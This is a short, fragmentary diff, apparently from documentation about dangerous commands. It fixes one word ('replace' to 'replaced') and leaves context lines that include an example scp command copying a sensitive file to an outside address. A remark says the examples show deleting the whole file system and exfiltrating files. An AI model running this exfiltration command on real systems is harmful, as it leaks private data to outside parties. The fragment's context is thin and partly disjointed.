Name, Symptom, and Result

 scp /path/to-sensitive/file firstname.lastname@example.org:

-In both operating systems, spaces may be replace with
+In both operating systems, spaces may be replaced with

 Literally anything.
 The above likely examples show deleting entire file system and exfiltrating sensitive file contents.